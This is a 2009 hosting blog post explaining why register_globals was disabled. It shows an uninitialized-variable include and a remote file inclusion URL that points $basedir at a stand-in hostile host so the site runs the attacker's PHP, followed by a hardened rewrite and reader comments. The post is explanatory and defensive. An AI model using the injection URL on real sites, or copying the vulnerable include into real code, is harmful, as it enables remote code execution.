24 June 2009
REGISTER_GLOBALS = OFF
Posted by Norman under: Guides .
You may be aware that we finally decided to disable register_globals in PHP by default on all servers, which annoyed some users … and while I was reading this great book I found a good example of how easy it is to HACK/CRACK a PHP website when register_globals is turned ON:
Imagine an index.php file that contains the following code:
<?php
// Vulnerable: $basedir is never initialized, so with register_globals ON
// a request parameter can supply its value (see below).
require_once ($basedir.'/somecode.php');
// More code that is perfectly safe follows
?>
Code like this is found in 99% of PHP software: it simply includes the legitimate somecode.php file, which contains more PHP code, and processes it.
If register_globals is turned ON, the hacker can request your index.php file using a URL like this one:
http://www.yourwebsite.com/index.php?basedir=http://www.nastysite.com
The result is that our vulnerable code will load and execute the code at http://www.nastysite.com/somecode.php. That means the cracker is able to load and execute his own somecode.php, which is arbitrary PHP code intended to hack your site.
I hope this explains why we disabled register_globals in all servers.
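For comparison, here is a hardened version of the index.php above that does not depend on register_globals being off. This is an added example, not code from the original post; the file name somecode.php comes from the post, while the helper name safeIncludePath and the check logic are my own.

```php
<?php
// Added example (not from the original post): hardened index.php.

// 1. Refuse to run if the interpreter still has register_globals enabled.
//    ini_get() returns "1"/"0" (or false where the directive no longer exists).
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('register_globals must be off.');
}

// 2. Always initialize every variable before use, so a request such as
//    ?basedir=http://www.nastysite.com can never supply it.
$basedir = __DIR__;

/**
 * Resolve $name inside $basedir and return its real path, or null when the
 * result is not a regular file under $basedir (rejects URLs, "..", and
 * symlinks pointing outside the application directory).
 */
function safeIncludePath(string $basedir, string $name): ?string
{
    // Only a plain file name is allowed: no scheme, no directory component.
    if (!preg_match('/\A[A-Za-z0-9_\-]+\.php\z/', $name)) {
        return null;
    }
    $base = realpath($basedir);
    $real = realpath($basedir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Confirm the resolved path still lives under $basedir.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$target = safeIncludePath($basedir, 'somecode.php');
if ($target === null) {
    http_response_code(500);
    exit('Required file missing or outside the application directory.');
}
require_once $target;
// More code that is perfectly safe follows
```

Initializing $basedir is the fix that matters; the path check and the register_globals guard are defence in depth for hosts where the php.ini cannot be trusted.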
4 Comments so far...
Robert Says:
25 June 2009 at 5:38 am.
We need an alternative code in order to stay operational.
Suggestions?
Robert
admin Says:
25 June 2009 at 5:50 am.
We are not programmers. You can put a local php.ini file in your account to enable register_globals (contact support for details), but you have a high risk of being hacked, and in that case we will not be able to help you.
Andy Says:
21 July 2009 at 11:50 pm.
As the register_globals issue is quite controversial, the PHP community has decided to remove this feature from PHP 6.0.0. So, if you’re relying on the register_globals in your project, it’s time to update your code.
See: http://us3.php.net/manual/en/ini.core.php#ini.register-globals
admin Says:
22 July 2009 at 1:20 am.
And register_globals is disabled by default in PHP 5.